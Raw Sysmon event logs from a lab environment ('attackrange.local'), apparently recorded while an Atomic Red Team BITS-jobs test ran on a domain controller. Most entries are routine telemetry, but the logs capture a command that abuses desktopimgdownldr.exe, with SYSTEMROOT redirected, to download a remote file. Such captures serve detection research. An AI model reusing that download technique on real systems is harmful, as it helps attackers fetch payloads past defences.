Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1CED1D66D2785654E3D56FFBD0E9228,SHA256=A9C7C1223BAEBAB708897A441752560CEB446A4636D876D7DD5CB5A526362CCF,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000001061873Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:10.076{7F8C56E7-4E3C-6063-1600-00000000AF01}1280raw.githubusercontent.com0::ffff:185.199.109.133;::ffff:185.199.110.133;::ffff:185.199.111.133;::ffff:185.199.108.133;C:\Windows\System32\svchost.exe 23542300x80000000000000001061872Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:14.041{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F7AAD07A9994CC78201130BDC59CCD9,SHA256=593FCA7D02C227D0B0049C3CA3C80B77D0513D677EECF023A6469A863C570EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246549Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:14.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49A4317F8B4FC2446D254C57FAF01B6D,SHA256=DEAC58132F1D872E1B1F428AB19854BAC290863F1E10DE37177AA3BEE5BCFA5A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061875Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:15.400{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB5A5FE72465FF3B8943182F06EBBED6,SHA256=3F8C4DD4939FC682A286F3FA32BF2F5A0B331A5B24C2166A7430111076876BD7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246552Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:14.583{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64826-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246551Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:15.164{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5155D49DBCC31011742520FE658DBCF8,SHA256=8FCE0060C36A52FA08D82980EBC6A165C159106938400652103F05949265C60A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246550Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:15.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=224F92B747492D188CE92F042134136F,SHA256=B4EB554CFB49694DCF8DA5C8A5B7B0D23DA10B51084E862EA78E9A0CD5E3EBE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061877Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:16.885{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53C6B0580C6B9293E4A3145A6481AE67,SHA256=E9CC639777991A34DC70D2E2C56AD18EE24398EA1CD78C2D438A2773A71F98B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061876Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:16.885{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FFEC284BFFD0D7F5F9D1F72CB9FFB5B,SHA256=CF43345E828B2BB4C081EC0700789EE53D210B965702C630EA94CE7DA4EC317E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246553Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:33:16.132{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90E0A4AB2308EC53BDAA761A23E61413,SHA256=F61EDEDB414B7E35F67FF7DD35B793A23B00804172F0D7A39835643C56004339,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061910Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.369{7F8C56E7-4F87-6063-C900-00000000AF01}5652ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-err.txtMD5=FC8D71143F75255A31ACE3027A994CEF,SHA256=F39B16BA321649805F9468F7FC858B41604BC33B9CD97EE77749D12FFD6DC535,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001061909Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.338{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52CD-6063-4B01-00000000AF01}5732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061908Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.338{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061907Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.338{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061906Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.338{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061905Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.338{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061904Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.338{7F8C56E7-4E4F-6063-5500-00000000AF01}38244020C:\Windows\system32\csrss.exe{7F8C56E7-52CD-6063-4B01-00000000AF01}5732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061903Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.338{7F8C56E7-52CD-6063-4A01-00000000AF01}58804720C:\Windows\system32\cmd.exe{7F8C56E7-52CD-6063-4B01-00000000AF01}5732C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+c378|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061902Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.344{7F8C56E7-52CD-6063-4B01-00000000AF01}5732C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Execmd /c desktopimgdownldr.exe /lockscreenurl:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md /eventName:desktopimgdownldr C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{7F8C56E7-52CD-6063-4A01-00000000AF01}5880C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md /eventName:desktopimgdownldr" 10341000x80000000000000001061901Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.338{7F8C56E7-4F87-6063-CA00-00000000AF01}55846056C:\Windows\system32\conhost.exe{7F8C56E7-52CD-6063-4A01-00000000AF01}5880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061900Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.338{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52CD-6063-4A01-00000000AF01}5880C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+381f60|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c01f5|UNKNOWN(00007FFA71EB3F13) 10341000x80000000000000001061899Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.322{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061898Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.322{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061897Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.322{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061896Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.322{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061895Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.322{7F8C56E7-4E4F-6063-5500-00000000AF01}38243840C:\Windows\system32\csrss.exe{7F8C56E7-52CD-6063-4A01-00000000AF01}5880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061894Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.322{7F8C56E7-4F87-6063-C900-00000000AF01}56526096C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{7F8C56E7-52CD-6063-4A01-00000000AF01}5880C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\03d8559463173917309ec438a953ab13\Microsoft.PowerShell.Commands.Management.ni.dll+35ffe9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc612994(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc6127fb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc69b92c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc60aa81(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bd0db2d3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc5d0029(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc633a9b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc615aaa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc61593b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc60665b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+bc642cfe(wow64) 154100x80000000000000001061893Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.337{7F8C56E7-52CD-6063-4A01-00000000AF01}5880C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md /eventName:desktopimgdownldr" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{7F8C56E7-4E65-6063-912A-070000000000}0x72a912HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000001061892Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.322{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-03-30 16:33:11.072 11241100x80000000000000001061891Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.322{7F8C56E7-4F87-6063-C900-00000000AF01}5652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-03-30 16:33:11.072 23542300x80000000000000001061890Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.307{7F8C56E7-4F87-6063-C900-00000000AF01}5652ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=CDF0411C45A7199BF56E83B1DAD73671,SHA256=56B3E195F983EBED95CD837E56B0AA7888FBD27B137166B85A7B4AD87EF4BB9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061889Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.244{7F8C56E7-4E3C-6063-1600-00000000AF01}1280NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\ADMINI~1\AppData\Local\Temp\BITD243.tmpMD5=390416E85C29CC3B5762C3A0D98B568D,SHA256=F52E58DFF3AC5909C28F8C10B64C8D4EFC8888F68CDC72D5913E2B9F4734C2E8,IMPHASH=00000000000000000000000000000000falsefalse - shredded file with pattern 0x00 10341000x80000000000000001061888Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:33:17.229{7F8C56E7-4E3C-6063-0C00-00000000AF01}8323108C:\Windows\system32\svchost.exe{7F8C56E7-52CD-6063-4901-00000000AF01}5452C:\Windows\system32\bitsadmin.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 